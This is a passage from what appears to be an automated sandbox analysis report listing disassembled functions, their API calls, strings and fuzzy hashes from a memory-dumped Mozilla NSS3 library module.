Part of subcall function 6C7170F0: LeaveCriticalSection.KERNEL32(6C760C7B), ref: 6C71710D

EnterCriticalSection.KERNEL32(?), ref: 6C76AC44
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C76AC6E
_PR_MD_UNLOCK.NSS3(?), ref: 6C76AC97
EnterCriticalSection.KERNEL32(?), ref: 6C76ACBF
PR_NewCondVar.NSS3(?), ref: 6C76ACDB
_PR_MD_UNLOCK.NSS3(?), ref: 6C76AD0D
PR_SetPollableEvent.NSS3(?), ref: 6C76AD18
EnterCriticalSection.KERNEL32(?), ref: 6C76AD31

Part of subcall function 6C719890: TlsGetValue.KERNEL32(?,?,?,6C7197EB), ref: 6C71989E

_PR_MD_UNLOCK.NSS3(?), ref: 6C76AD89
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C76AD98
_PR_MD_UNLOCK.NSS3(?), ref: 6C76ADC5

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSection$Enter$CondErrorEventLeavePollableValue
String ID:
API String ID: 829741924-0
Opcode ID: 19ab90dcd34c18d86c03828c22b363c2488c6c935bde3657ff817eed630054af
Instruction ID: ec39e09e2d8c244c3818eb145b51f5406f92635ede7529aa1b9c41345026863e
Opcode Fuzzy Hash: 19ab90dcd34c18d86c03828c22b363c2488c6c935bde3657ff817eed630054af
Instruction Fuzzy Hash: 8C61AEB28007109FC7109F22CA8874AB7F4AF94329F298679D85A57F16E731F849CB90

Function 6C64ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C64ACE2
malloc.MOZGLUE(00000001), ref: 6C64ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C64AD02
TlsGetValue.KERNEL32 ref: 6C64AD3C
calloc.MOZGLUE(00000001,?), ref: 6C64AD8C
PR_Unlock.NSS3 ref: 6C64ADC0
free.MOZGLUE(00000000), ref: 6C64AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C64AE58
free.MOZGLUE(00000000), ref: 6C64AE69
free.MOZGLUE(?), ref: 6C64AE78
PR_Unlock.NSS3 ref: 6C64AE8C
free.MOZGLUE(?), ref: 6C64AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C64AEC7

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 84f6e60270b873b5bf19e335ede44e8364a518f43c777defb0ce42703ea2c3ad
Instruction ID: 6106790eaf8e23609cd09d723854ff11c9532eb50bce59898821e2ab9ce1c20f
Opcode Fuzzy Hash: 84f6e60270b873b5bf19e335ede44e8364a518f43c777defb0ce42703ea2c3ad
Instruction Fuzzy Hash: 0051CEB1E01216ABDF00DFA8DC45AAE77B4BB06349F14C135D814A7B12E731A915CBEE

Function 6C724C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C724CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C724CFD
sqlite3_value_text16.NSS3(?), ref: 6C724D44

Strings

unknown error, xrefs: 6C724D56
bad parameter or other API misuse, xrefs: 6C724D05
out of memory, xrefs: 6C724C78, 6C724C9E
no more rows available, xrefs: 6C724D2E
invalid, xrefs: 6C724CF1
API call with %s database connection pointer, xrefs: 6C724CF6
another row available, xrefs: 6C724D20
abort due to ROLLBACK, xrefs: 6C724D27, 6C724D33

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 3507746ccf8fa93d6c10d310b67e49ebcf88de9919d69bc53533051726c1ce75
Instruction ID: d20f984e5d4986f1caa022d4c81b56f581435f2f232f62a3877840c1ca14a411
Opcode Fuzzy Hash: 3507746ccf8fa93d6c10d310b67e49ebcf88de9919d69bc53533051726c1ce75
Instruction Fuzzy Hash: A531CB73E08811A7D7084A2CAB127A57721B783318F150535C9244BF55C7BCAC91B7E6

Function 6C682CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C682CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C682D07

Part of subcall function 6C7609D0: PR_Now.NSS3 ref: 6C760A22
Part of subcall function 6C7609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C760A35
Part of subcall function 6C7609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C760A66
Part of subcall function 6C7609D0: PR_GetCurrentThread.NSS3 ref: 6C760A70
Part of subcall function 6C7609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C760A9D
Part of subcall function 6C7609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C760AC8
Part of subcall function 6C7609D0: PR_vsmprintf.NSS3(?,?), ref: 6C760AE8
Part of subcall function 6C7609D0: EnterCriticalSection.KERNEL32(?), ref: 6C760B19
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C760B48
Part of subcall function 6C7609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C760C76
Part of subcall function 6C7609D0: PR_LogFlush.NSS3 ref: 6C760C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C682D22

Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(?), ref: 6C760B88
Part of subcall function 6C7609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C760C5D
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C760C8D
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760C9C
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(?), ref: 6C760CD1
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C760CEC
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760CFB
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C760D16
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C760D26
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760D35
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C760D65
Part of subcall function 6C7609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C760D70
Part of subcall function 6C7609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C760D90
Part of subcall function 6C7609D0: free.MOZGLUE(00000000), ref: 6C760D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C682D3B

Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C760BAB
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760BBA
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C682D54

Part of subcall function 6C7609D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C760BCB
Part of subcall function 6C7609D0: EnterCriticalSection.KERNEL32(?), ref: 6C760BDE
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(?), ref: 6C760C16

Strings

C_InitToken, xrefs: 6C682CE7
slotID = 0x%x, xrefs: 6C682D02
pLabel = 0x%p, xrefs: 6C682D4F
pPin = 0x%p, xrefs: 6C682D1D
ulPinLen = %d, xrefs: 6C682D36
nvl, xrefs: 6C682D6C, 6C682D9A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nvl
API String ID: 420000887-506700037
Opcode ID: ef7b5359429b0a0586b3b60ace916b72e40df43bf4c13400fdcbc6675a6f3562
Instruction ID: 955d1e8f7988c384628d13504675b998b6af728c9adcb911813f16929084d8b2
Opcode Fuzzy Hash: ef7b5359429b0a0586b3b60ace916b72e40df43bf4c13400fdcbc6675a6f3562
Instruction Fuzzy Hash: 7B218675202148AFDB009F54DE8CE453FF6EB4235DF448034E90897A62DB309959CB7E

Function 6C682AF0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismList), ref: 6C682B0C
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C682B59

Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C760BAB
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760BBA
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760D7E

PR_LogPrint.NSS3( pMechanismList = 0x%p,?), ref: 6C682B3E

Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(?), ref: 6C760B88
Part of subcall function 6C7609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C760C5D
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C760C8D
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760C9C
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(?), ref: 6C760CD1
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C760CEC
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760CFB
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C760D16
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C760D26
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760D35
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C760D65
Part of subcall function 6C7609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C760D70
Part of subcall function 6C7609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C760D90
Part of subcall function 6C7609D0: free.MOZGLUE(00000000), ref: 6C760D99

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C682B25

Part of subcall function 6C7609D0: PR_Now.NSS3 ref: 6C760A22
Part of subcall function 6C7609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C760A35
Part of subcall function 6C7609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C760A66
Part of subcall function 6C7609D0: PR_GetCurrentThread.NSS3 ref: 6C760A70
Part of subcall function 6C7609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C760A9D
Part of subcall function 6C7609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C760AC8
Part of subcall function 6C7609D0: PR_vsmprintf.NSS3(?,?), ref: 6C760AE8
Part of subcall function 6C7609D0: EnterCriticalSection.KERNEL32(?), ref: 6C760B19
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C760B48
Part of subcall function 6C7609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C760C76
Part of subcall function 6C7609D0: PR_LogFlush.NSS3 ref: 6C760C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C682BC0

Strings

pulCount = 0x%p, xrefs: 6C682B54
pMechanismList = 0x%p, xrefs: 6C682B39
slotID = 0x%x, xrefs: 6C682B20
*pulCount = 0x%x, xrefs: 6C682BBB
nvl, xrefs: 6C682B71, 6C682B9C
C_GetMechanismList, xrefs: 6C682B07

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: DebugOutputPrintStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pMechanismList = 0x%p$ pulCount = 0x%p$ slotID = 0x%x$C_GetMechanismList$nvl
API String ID: 1342304006-2936718529
Opcode ID: 69b85a33d2b0d1cb3949d81580ccc44b4871bc63a9581a02d8256aae2f7e5320
Instruction ID: fdb41bf1b08201c210448cc52dc107f09120d1879719b9c7bde45e70dbb95c85
Opcode Fuzzy Hash: 69b85a33d2b0d1cb3949d81580ccc44b4871bc63a9581a02d8256aae2f7e5320
Instruction Fuzzy Hash: 4821AF7160314AAFDB008F54DE8DE893BB1EB4275DF048075E908A7B11DB309948CB6E

Function 6C654880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6548A2
PORT_NewArena_Util.NSS3(00000800), ref: 6C6548C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C6548D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C6548FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C654908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C654947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C65496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C654988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C778DAC,?), ref: 6C6549DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6549FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C654ACB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: bc0ffd925d3734e03de3a6e169b6912f1dfbe2fabd70a0890c72ee9612b01e66
Instruction ID: 51c348fd366f8809d945e809b48ab2097ae85620730f38de2e56a9c03e7f767e
Opcode Fuzzy Hash: bc0ffd925d3734e03de3a6e169b6912f1dfbe2fabd70a0890c72ee9612b01e66
Instruction Fuzzy Hash: E45114B4A043019BEB508F65DC417AB37E4AF4130CF644068E919ABB85E7F1D4348B6E

Function 6C722D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C722D9F

Part of subcall function 6C5DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C63F9C9,?,6C63F4DA,6C63F9C9,?,?,6C60369A), ref: 6C5DCA7A
Part of subcall function 6C5DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5DCB26

sqlite3_exec.NSS3(?,?,6C722F70,?,?), ref: 6C722DF9
sqlite3_free.NSS3(00000000), ref: 6C722E2C
sqlite3_free.NSS3(?), ref: 6C722E3A
sqlite3_free.NSS3(?), ref: 6C722E52
sqlite3_mprintf.NSS3(6C78AAF9,?), ref: 6C722E62
sqlite3_free.NSS3(?), ref: 6C722E70
sqlite3_free.NSS3(?), ref: 6C722E89
sqlite3_free.NSS3(?), ref: 6C722EBB
sqlite3_free.NSS3(?), ref: 6C722ECB
sqlite3_free.NSS3(00000000), ref: 6C722F3E
sqlite3_free.NSS3(?), ref: 6C722F4C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 0e6a4e4ec064bad3a4a2e42bc72709a20611f34633e53df68bd94d7e87707af0
Instruction ID: b39af2a6352e5ed4a62118d0c17db90a238e48776222c0a02910b1962d4f26b3
Opcode Fuzzy Hash: 0e6a4e4ec064bad3a4a2e42bc72709a20611f34633e53df68bd94d7e87707af0
Instruction Fuzzy Hash: E36190B5E112058BEB10CF68D989B9EB7B5EF88368F154038DC15A7701EB39E845CBA1

Function 6C5D4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4D97
PR_Lock.NSS3(?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4DBA
PR_WaitCondVar.NSS3 ref: 6C5D4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4DEF

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 8aaacbb53f269875e8be44293b8c15b2196d29bfa51fd197a381209bcb6ae6bb
Instruction ID: b5fcaae559bf753048d4b60958587037310b3b922127659d4ecc4e21f5f8e7a1
Opcode Fuzzy Hash: 8aaacbb53f269875e8be44293b8c15b2196d29bfa51fd197a381209bcb6ae6bb
Instruction Fuzzy Hash: 85414DB5A04715CFCB00EF7CD48855977F4BF06318B168A79D8989B710EB30E895CB9A

Function 6C678F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C678FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C678FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C678FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C679013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C679042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C67905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C679073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C6790EC

Part of subcall function 6C640F00: PR_GetPageSize.NSS3(6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F1B
Part of subcall function 6C640F00: PR_NewLogModule.NSS3(clock,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C679111

Strings

nvl, xrefs: 6C6790A3

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: nvl
API String ID: 2831689957-2622381835
Opcode ID: afe78bc33f057b9082db7b430dd6efd43c97ea06c247e4ff300a89fba2d6200a
Instruction ID: d74f2e93babd35cd936143d9b71e5b7503c60e8e16c168bc921b4e38c40c5d29
Opcode Fuzzy Hash: afe78bc33f057b9082db7b430dd6efd43c97ea06c247e4ff300a89fba2d6200a
Instruction Fuzzy Hash: 2E51AB70A042158FCF10EF38C488699BBF1BF0A358F0559B9DC449B716EB35E885CBA9

Function 6C65E910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C65E93B
PR_SetError.NSS3(FFFFE075,00000000), ref: 6C65E94E
PORT_Alloc_Util.NSS3(00000001), ref: 6C65E995
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C65E9A7
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C65E9CA
PORT_Strdup_Util.NSS3(6C79933E), ref: 6C65EA17
PORT_Alloc_Util.NSS3(00000001), ref: 6C65EA28

Part of subcall function 6C6B0BE0: malloc.MOZGLUE(6C6A8D2D,?,00000000,?), ref: 6C6B0BF8
Part of subcall function 6C6B0BE0: TlsGetValue.KERNEL32(6C6A8D2D,?,00000000,?), ref: 6C6B0C15

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C65EA3C
